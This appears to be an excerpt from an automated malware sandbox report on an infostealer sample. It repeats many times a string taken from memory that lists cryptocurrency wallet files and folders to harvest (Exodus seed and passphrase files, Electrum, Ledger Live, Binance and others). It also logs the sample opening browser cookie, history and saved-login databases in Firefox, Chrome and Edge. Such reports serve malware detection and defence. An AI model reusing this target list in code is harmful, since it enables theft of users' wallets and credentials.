Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.0000000000618000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
